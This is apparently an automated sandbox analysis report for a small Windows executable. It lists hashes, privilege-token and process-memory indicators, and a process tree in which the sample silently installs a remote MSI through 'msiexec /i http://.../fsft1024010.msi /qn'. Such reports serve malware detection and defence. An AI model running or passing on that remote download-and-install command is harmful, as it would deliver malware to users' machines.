5308d9d9e639237d52fd3bef9a96f65a9fffac6de409b598f49433d85899160b

Analysis

max time kernel
123s
max time network
197s
platform
windows10-2004_x64
resource
win10v2004-20231023-en
resource tags

arch:x64arch:x86image:win10v2004-20231023-enlocale:en-usos:windows10-2004-x64system
submitted
07-11-2023 14:38

Target

5308d9d9e639237d52fd3bef9a96f65a9fffac6de409b598f49433d85899160b.exe
Size

2KB
MD5

3d589fea83404c01318894e648b3d2bd
SHA1

6df9835b0ea303f99532b8de1f0503ec5894d7ce
SHA256

5308d9d9e639237d52fd3bef9a96f65a9fffac6de409b598f49433d85899160b
SHA512

f9a6c72fbbd94bddd4b13b2cc60eb49a948dae473cb44cc334a01a90e399c86977bb7ede7f96ed3c4a35abdcaddcafc9945ddeb642a123c537b984fb5068086e

Score

7^/10

Use of msiexec (install) with remote resource 1 IoCs

pid	Process
4968	msiexec.exe

Suspicious use of AdjustPrivilegeToken 32 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4968	msiexec.exe
Token: SeIncreaseQuotaPrivilege	4968	msiexec.exe
Token: SeSecurityPrivilege	4400	msiexec.exe
Token: SeCreateTokenPrivilege	4968	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	4968	msiexec.exe
Token: SeLockMemoryPrivilege	4968	msiexec.exe
Token: SeIncreaseQuotaPrivilege	4968	msiexec.exe
Token: SeMachineAccountPrivilege	4968	msiexec.exe
Token: SeTcbPrivilege	4968	msiexec.exe
Token: SeSecurityPrivilege	4968	msiexec.exe
Token: SeTakeOwnershipPrivilege	4968	msiexec.exe
Token: SeLoadDriverPrivilege	4968	msiexec.exe
Token: SeSystemProfilePrivilege	4968	msiexec.exe
Token: SeSystemtimePrivilege	4968	msiexec.exe
Token: SeProfSingleProcessPrivilege	4968	msiexec.exe
Token: SeIncBasePriorityPrivilege	4968	msiexec.exe
Token: SeCreatePagefilePrivilege	4968	msiexec.exe
Token: SeCreatePermanentPrivilege	4968	msiexec.exe
Token: SeBackupPrivilege	4968	msiexec.exe
Token: SeRestorePrivilege	4968	msiexec.exe
Token: SeShutdownPrivilege	4968	msiexec.exe
Token: SeDebugPrivilege	4968	msiexec.exe
Token: SeAuditPrivilege	4968	msiexec.exe
Token: SeSystemEnvironmentPrivilege	4968	msiexec.exe
Token: SeChangeNotifyPrivilege	4968	msiexec.exe
Token: SeRemoteShutdownPrivilege	4968	msiexec.exe
Token: SeUndockPrivilege	4968	msiexec.exe
Token: SeSyncAgentPrivilege	4968	msiexec.exe
Token: SeEnableDelegationPrivilege	4968	msiexec.exe
Token: SeManageVolumePrivilege	4968	msiexec.exe
Token: SeImpersonatePrivilege	4968	msiexec.exe
Token: SeCreateGlobalPrivilege	4968	msiexec.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2000 wrote to memory of 2332	2000	5308d9d9e639237d52fd3bef9a96f65a9fffac6de409b598f49433d85899160b.exe	93
PID 2000 wrote to memory of 2332	2000	5308d9d9e639237d52fd3bef9a96f65a9fffac6de409b598f49433d85899160b.exe	93
PID 2000 wrote to memory of 2332	2000	5308d9d9e639237d52fd3bef9a96f65a9fffac6de409b598f49433d85899160b.exe	93
PID 2332 wrote to memory of 4968	2332	cmd.exe	98
PID 2332 wrote to memory of 4968	2332	cmd.exe	98
PID 2332 wrote to memory of 4968	2332	cmd.exe	98

C:\Users\Admin\AppData\Local\Temp\5308d9d9e639237d52fd3bef9a96f65a9fffac6de409b598f49433d85899160b.exe
"C:\Users\Admin\AppData\Local\Temp\5308d9d9e639237d52fd3bef9a96f65a9fffac6de409b598f49433d85899160b.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2000
- C:\Windows\SysWOW64\cmd.exe
  cmd /d /c start msiexec /i http://231024224420010.mav.clx32.cfd/f/fsft1024010.msi /qn
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2332
- - C:\Windows\SysWOW64\msiexec.exe
    msiexec /i http://231024224420010.mav.clx32.cfd/f/fsft1024010.msi /qn
    3⤵
    - Use of msiexec (install) with remote resource
    - Suspicious use of AdjustPrivilegeToken
    PID:4968

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4400